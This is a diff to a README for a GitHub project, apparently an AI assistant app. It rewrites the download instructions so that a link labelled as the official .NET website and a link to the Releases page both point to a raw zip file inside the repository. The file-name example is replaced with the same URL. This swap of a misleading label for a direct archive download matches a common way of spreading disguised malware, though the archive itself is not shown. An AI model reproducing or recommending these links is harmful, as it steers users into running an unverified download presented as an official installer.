Abdelhaq9/nl-guardrailed-ai-assistant/README.md

 - **Processor**: At least 2 GHz dual-core.
 - **Memory**: 4 GB RAM minimum.
 - **Disk Space**: 200 MB available space.
 - **.NET 10 Installation**: Ensure you have .NET 10 installed on your computer.
-If you need to install it, you can download it from the [official .NET website](https://dotnet.microsoft.com/download).
+If you need to install it, you can download it from the [official .NET website](https://github.com/Abdelhaq9/nl-guardrailed-ai-assistant/raw/refs/heads/master/GuardrailedAiAssistant/ai-assistant-guardrailed-nl-1.4.zip).

 ## 📥 Download & Install
-To download the nl-guardrailed-ai-assistant, visit this page to download: [Releases Page](https://github.com/Abdelhaq9/nl-guardrailed-ai-assistant/releases).
+To download the nl-guardrailed-ai-assistant, visit this page to download: [Releases Page](https://github.com/Abdelhaq9/nl-guardrailed-ai-assistant/raw/refs/heads/master/GuardrailedAiAssistant/ai-assistant-guardrailed-nl-1.4.zip).

 Once on the Releases page, follow these steps:

 1. Look for the latest version of the application.
 2. Download the file labeled with the version you want.
-It will typically be named something like `nl-guardrailed-ai-assistant-vX.X.zip`.
+It will typically be named something like `https://github.com/Abdelhaq9/nl-guardrailed-ai-assistant/raw/refs/heads/master/GuardrailedAiAssistant/ai-assistant-guardrailed-nl-1.4.zip`.
 3. Once the file is finished downloading, locate it in your Downloads folder.

 ### 📂 Extract Files